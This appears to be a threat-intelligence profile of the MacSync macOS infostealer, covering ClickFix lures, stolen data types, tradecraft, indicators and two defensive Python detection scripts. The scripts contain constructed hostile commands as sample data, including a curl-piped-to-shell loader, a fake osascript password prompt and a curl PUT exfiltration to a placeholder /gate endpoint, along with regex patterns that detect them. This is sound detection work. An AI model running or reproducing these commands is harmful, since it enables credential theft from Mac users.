MacSync
MacSync is a macOS infostealer, also referred to in reporting as MacSync Stealer and tracked by some researchers as BarkBlitz. The malware is actively distributed through social-engineering campaigns rather than exploits, most prominently ClickFix-style lures that trick users into pasting malicious commands into Terminal, as well as SEO poisoning, poisoned Google Ads, fake troubleshooting pages, fake Zoom/Trezor Suite/Ledger installers, and abuse of legitimate platforms such as Claude.ai shared chats, Google Sites, Framer, Medium, Craft, and Squarespace. Reporting describes MacSync as an actively operated malware-as-a-service operation leased to other cybercriminals, with activity observed since at least November 2025 and continued use through 2026.
Across the cited reporting, MacSync is used to harvest browser credentials, cookies, active session tokens, and macOS Keychain contents. Higher-confidence reporting also states it targets cryptocurrency wallet data, including browser wallet extensions and desktop wallets, and can collect SSH keys, AWS credentials, Kubernetes configuration, Telegram Desktop session data, Apple Notes data, Safari cookies and history, shell history, and sensitive files from user directories. Multiple reports state that MacSync stages stolen data in temporary directories such as /tmp/sync<random digits>/, compresses it into archives such as /tmp/osalogging.zip, and exfiltrates it to attacker-controlled infrastructure, including via chunked HTTP PUT uploads to a /gate endpoint using API-key authentication.
MacSync commonly uses native macOS tooling for execution and evasion. Reported tradecraft includes curl-based shell loaders, in-memory execution through osascript, fake password prompts styled as System Preferences dialogs, local password validation with dscl, quarantine or extended-attribute removal with xattr, and persistence via LaunchAgents, LaunchDaemons, or disguised updater components. Some campaigns profile victims before full execution, collecting hostname, OS version, external IP, and keyboard locale, and include a CIS-region avoidance check that exits when Russian or other CIS keyboard settings are detected. Reporting also describes trojanization of cryptocurrency applications, especially Ledger Wallet and Ledger Live, by replacing application resources and re-signing them so seed phrases or transactions can be intercepted later.
Researchers linked MacSync to infrastructure and artifacts including the Apple Developer ID certificate for OKAN ATAKOL (Team ID GNJLS3UYZ4), which multiple reports say was used to sign MacSync samples to help bypass Gatekeeper. Reported MacSync-related infrastructure includes domains such as bluestonerepair[.]com, gatemaden[.]space, audio-drivers-zoom[.]us, mansfieldpediatrics[.]com, houstongaragedoorinstallers[.]com, and filegrowthlabs[.]com, as well as C2 IPs including 172.94.9[.]250 and 68.183.52[.]163. A shared API key, 5190ef1733183a0dc63fb623357f56d6, was reported across multiple MacSync samples and campaigns. Follow-on research also describes a mature MaaS management panel with customized lure builders, remote command execution, file theft, cookie restoration, affiliate access, and SOCKS5 proxy activation on infected Macs.
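The LaunchAgent and LaunchDaemon persistence described above can be hunted on disk rather than only in process telemetry. The following Python script is an added example for this page, not Mallory's or any vendor's tooling: its indicator list is one reading of the reported tradecraft (curl and osascript loaders, /tmp staging, disguised updater components), the plist keys it inspects are the standard launchd ones, and the two sample plists it writes to a temporary directory are constructed. Code-signing checks (codesign, Team ID lookups) are deliberately left out so the script also runs off-macOS.

```python
"""Audit LaunchAgent/LaunchDaemon plists for loader-style persistence.

Added example, not Mallory or vendor tooling. The SUSPICIOUS_ARG list is an
assumption made for illustration; the plists written by demo() are constructed.
"""
import plistlib
import re
import tempfile
from pathlib import Path

# Substrings that rarely belong in a legitimate vendor agent's program line:
# network fetch tools, script interpreters, in-memory decode helpers, and
# ephemeral or hidden paths under /tmp or a user's home directory.
SUSPICIOUS_ARG = re.compile(
    r"(\bcurl\b|\bosascript\b|\bbase64\b|\beval\b|/private/tmp/|/tmp/|/Users/[^/]+/\.[^/]+/)",
    re.I,
)


def audit_plist(path):
    """Return a finding dict for one plist, or None when nothing looks off."""
    with Path(path).open("rb") as fh:
        data = plistlib.load(fh)
    # launchd accepts either ProgramArguments (a list) or Program (a string).
    args = data.get("ProgramArguments") or ([data["Program"]] if "Program" in data else [])
    joined = " ".join(str(a) for a in args)
    reasons = sorted({m.group(0).lower() for m in SUSPICIOUS_ARG.finditer(joined)})
    if not reasons:
        return None
    return {
        "path": str(path),
        "label": data.get("Label"),
        "run_at_load": bool(data.get("RunAtLoad")),
        "program": joined,
        "reasons": reasons,
    }


def audit_dir(directory):
    """Audit every *.plist in a directory; unparseable files are reported too."""
    findings = []
    for p in sorted(Path(directory).glob("*.plist")):
        try:
            finding = audit_plist(p)
        except Exception as exc:  # a plist launchd cannot parse is itself worth a look
            findings.append({"path": str(p), "label": None, "run_at_load": False,
                             "program": "", "reasons": ["unparseable:" + type(exc).__name__]})
            continue
        if finding:
            findings.append(finding)
    return findings


def demo():
    """Write two constructed plists to a temp dir and audit them."""
    d = Path(tempfile.mkdtemp())
    # Constructed: a disguised-updater style agent that fetches and runs a script.
    with (d / "com.placeholder.updater.plist").open("wb") as fh:
        plistlib.dump({
            "Label": "com.placeholder.updater",
            "ProgramArguments": ["/bin/zsh", "-c",
                                 "curl -fsSL https://lure.invalid/u -o /tmp/u && osascript /tmp/u"],
            "RunAtLoad": True,
            "KeepAlive": True,
        }, fh)
    # Constructed: a benign scheduled job with a fixed local binary.
    with (d / "com.example.backup.plist").open("wb") as fh:
        plistlib.dump({
            "Label": "com.example.backup",
            "ProgramArguments": ["/usr/local/bin/backup", "--daily"],
            "StartCalendarInterval": {"Hour": 2},
        }, fh)
    return audit_dir(d)


if __name__ == "__main__":
    # On a real Mac, point this at the standard launchd directories instead.
    launch_dirs = [Path("/Library/LaunchAgents"), Path("/Library/LaunchDaemons"),
                   Path.home() / "Library/LaunchAgents"]
    for finding in demo() + [f for ld in launch_dirs if ld.is_dir() for f in audit_dir(ld)]:
        print(finding)
```

Run it as-is to see the constructed updater plist flagged for `curl`, `osascript` and `/tmp/`; on a macOS host the `__main__` block additionally walks the real launchd directories. Hits should be reviewed alongside the binary's signature and the plist's creation time rather than treated as a verdict on their own.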
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
"Threat Details and IOCs Malware: Mac.c, MacSync, MacSync Stealer CVEs: CVE-2023-31290"
Techniques & procedures
26 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniques
Attackers are currently running a malvertising campaign that uses Google Ads and legitimate shared chats on Claude.ai to spread macOS infostealer malware.
"...MacSync... currently distributed via SEO poisoning campaigns."
Initial Access
1 technique
Mac users are encountering deceptive websites—often through Google Ads or malicious advertisements... During November 2025, Microsoft Defender Experts identified a WhatsApp platform abuse campaign... sends malicious attachments to all contacts using predefined messaging templates.
Execution
5 techniques
Initial commands leverage curl to fetch obfuscated payloads, which are piped directly into shell interpreters (bash/zsh), minimizing the disk footprint.
These campaigns leverage fileless execution, native macOS utilities, and AppleScript automation to harvest credentials... Suspicious AppleScript activity.
Since February 2026, one observed campaign variant uses curl to pull a loader shell from attacker infrastructure the moment the ClickFix command runs. That loader is a zsh script, a macOS default shell that decodes and decompresses an embedded payload using Base64 and Gzip before executing it in memory using eval.
That page then tells them to open Terminal and paste a command. Instead of installing useful software, the command quietly downloads and runs malware on the victim’s Mac.
Attackers exploit this trust by providing malicious command strings that mimic legitimate installation procedures.
Persistence
2 techniques
Privilege Escalation
2 techniques
Stealth
3 techniques
The command being pasted downloads a shell script that is encoded in base64 from domains controlled by attackers.
The server delivers a uniquely obfuscated version of the payload for each request, a technique known as polymorphic delivery.
Credential Access
6 techniques
AWS credentials, SSH keys, Kubernetes configuration files, crypto seed phrases, and corporate SSO sessions all live in Keychain or browser credential stores on those machines — and AMOS, MacSync, and Shub Stealer are all purpose-built to harvest exactly that data.
In some variants, the payload is linked to MacSync-style infostealer behavior, aimed at harvesting browser credentials, cookies, and Keychain data.
Leverage Defender’s custom detection rules to alert on abnormal access to Keychain, browser credential stores, and cloud/developer artifacts, including SSH keys, Kubernetes configs, AWS credentials, and wallet data.
Microsoft recommends... custom detection rules covering abnormal Keychain access, browser credential store queries, and cloud credential file reads.
All three harvest the same types of data—browser credentials, saved passwords... CrystalPDF.exe... covertly hijacking Firefox and Chrome browsers to access sensitive files... including cookies, session data, and credential caches.
Discovery
2 techniques
It also gathers the external IP address, hostname, operating system version, and keyboard locale, which it then transmits back to the attacker.
Collection
1 technique
Detect transient creation of ZIP archives under /tmp or similar ephemeral directories, followed by outbound exfiltration attempts... Sensitive browser information compressed into ZIP file for exfiltration.
Command and Control
3 techniques
One of the payloads is a Python script that establishes communication with a remote server... Communication to command and control server.
Inspect network egress for POST requests to newly registered or suspicious domains... Exfiltration through curl.
Since February 2026, one observed campaign variant uses curl to pull a loader shell from attacker infrastructure the moment the ClickFix command runs.
Exfiltration
1 technique
...collected sensitive information, and exfiltrated the data via Telegram... then send everything to attacker servers... Exfiltration through curl.
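The Collection, Command and Control and Exfiltration entries above (transient ZIP archives under /tmp followed by outbound uploads, exfiltration through curl) and the tradecraft summarised in the description (curl piped into a shell, base64+gzip in-memory loaders, osascript password prompts with a hidden answer, dscl password validation, quarantine-attribute removal, /tmp/sync<digits> staging, HTTP PUT to a /gate path) line up as one sequence in process telemetry. The following Python script is an added example, not Mallory's or any vendor's detection content: the event schema (ts, pid, ppid, proc, cmdline) stands in for an EDR or Endpoint Security export, the regexes and severity thresholds are this example's own choices, and every sample event, IP and domain is constructed.

```python
"""Correlate MacSync-style ClickFix tradecraft across a macOS process session.

Added example; not Mallory or vendor logic. Event schema, rules, thresholds
and SAMPLE_EVENTS are assumptions made for illustration.
"""
import json
import re
from collections import defaultdict

# (rule name, pattern over the process command line). Each pattern maps to a
# behaviour described in public reporting on this family.
PROCESS_RULES = [
    ("curl_piped_to_shell", re.compile(r"curl\b[^|;]*\|\s*(ba|z)?sh\b")),
    ("base64_gunzip_eval_loader", re.compile(r"eval\b.*base64\s+(-d|-D|--decode).*\|\s*gunzip")),
    ("osascript_hidden_password_prompt", re.compile(r"osascript.*display dialog.*hidden answer", re.S)),
    ("dscl_local_password_check", re.compile(r"dscl\s+\.\s+-authonly\b")),
    ("quarantine_xattr_removal",
     re.compile(r"xattr\s+(-[rdc]*d[rdc]*\s+com\.apple\.quarantine\b|-[rc]*c[rc]*\s)")),
    ("tmp_sync_staging_dir", re.compile(r"/tmp/sync\d+/?")),
    ("zip_archive_in_tmp", re.compile(r"\bzip\b.*\s/tmp/\S+\.zip\b")),
    ("curl_put_to_gate", re.compile(r"curl\b.*(-X\s*PUT|--upload-file|-T\s).*\S+/gate\b")),
]

# Constructed telemetry. pid 501 is the Terminal shell the ClickFix paste ran in;
# 203.0.113.10 and lure.invalid are documentation placeholders, not real IOCs.
SAMPLE_EVENTS = [
    {"ts": 100, "pid": 501, "ppid": 400, "proc": "zsh",
     "cmdline": "/bin/zsh -c 'curl -fsSL https://lure.invalid/fix.sh | bash'"},
    {"ts": 101, "pid": 502, "ppid": 501, "proc": "zsh",
     "cmdline": "zsh -c 'eval \"$(echo PLACEHOLDER | base64 -d | gunzip)\"'"},
    {"ts": 102, "pid": 503, "ppid": 502, "proc": "osascript",
     "cmdline": "osascript -e 'display dialog \"Enter your password\" default answer \"\" with hidden answer'"},
    {"ts": 103, "pid": 504, "ppid": 502, "proc": "dscl",
     "cmdline": "dscl . -authonly alice <redacted>"},
    {"ts": 104, "pid": 505, "ppid": 502, "proc": "xattr",
     "cmdline": "xattr -rd com.apple.quarantine /Users/alice/Downloads/Installer.app"},
    {"ts": 105, "pid": 506, "ppid": 502, "proc": "zip",
     "cmdline": "zip -r /tmp/osalogging.zip /tmp/sync48213/"},
    {"ts": 106, "pid": 507, "ppid": 502, "proc": "curl",
     "cmdline": "curl -X PUT -H 'X-API-Key: REDACTED' --data-binary @/tmp/osalogging.zip http://203.0.113.10/gate"},
    {"ts": 900, "pid": 600, "ppid": 1, "proc": "curl",  # benign download, unrelated session
     "cmdline": "curl -fsSL https://example.com/notes.txt -o /tmp/notes.txt"},
]


def match_process_rules(event):
    """Names of every rule whose pattern appears in the event's command line."""
    return [name for name, rx in PROCESS_RULES if rx.search(event["cmdline"])]


def session_root(pid, parent_of):
    """Walk ppid links up to the oldest ancestor present in the telemetry."""
    seen = set()
    while parent_of.get(pid) in parent_of and pid not in seen:
        seen.add(pid)
        pid = parent_of[pid]
    return pid


def hunt(events, window_s=300):
    """Group rule hits by process session and score them; returns alert dicts."""
    parent_of = {e["pid"]: e["ppid"] for e in events}
    sessions = defaultdict(list)
    for e in events:
        hits = match_process_rules(e)
        if hits:
            sessions[session_root(e["pid"], parent_of)].append((e["ts"], e["pid"], hits))
    alerts = []
    for root, items in sorted(sessions.items()):
        items.sort()
        rules = sorted({r for _, _, hs in items for r in hs})
        zip_ts = [ts for ts, _, hs in items if "zip_archive_in_tmp" in hs]
        put_ts = [ts for ts, _, hs in items if "curl_put_to_gate" in hs]
        # Staging archive under /tmp followed by a PUT within the window is the
        # strongest single signal; otherwise require several distinct behaviours.
        staged_then_exfil = any(0 <= p - z <= window_s for z in zip_ts for p in put_ts)
        if staged_then_exfil or len(rules) >= 3:
            severity = "high"
        elif len(rules) == 2:
            severity = "medium"
        else:
            continue  # one isolated hit (e.g. a lone xattr -c) is too noisy to page on
        alerts.append({"root_pid": root, "severity": severity, "rules": rules,
                       "staged_then_exfil": staged_then_exfil,
                       "pids": [pid for _, pid, _ in items]})
    return alerts


if __name__ == "__main__":
    print(json.dumps(hunt(SAMPLE_EVENTS), indent=2))
```

On the constructed events the shell at pid 501 is reported once, at high severity, with all eight rules and the staging-then-upload pair, while the unrelated benign curl download produces nothing. The session grouping is what keeps the individual rules tolerable: `xattr -c` or a single `curl | sh` alone is common developer activity, so the score only pages when several behaviours share an ancestor within the window.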
Other
1 technique
IOCs tracked for this family
177 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
63 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A named macOS malware payload observed in ClickFix campaigns; the content lists it as part of the payload set used by multiple threat groups.
An infostealer targeting Mac users, associated here with theft of browser credentials, cookies, and Keychain data.
macOS stealer referenced as using the same ClickFix-style social engineering approach and AI-themed lures for infection.
A macOS stealer referenced as using the same ClickFix-style social engineering approach for infection.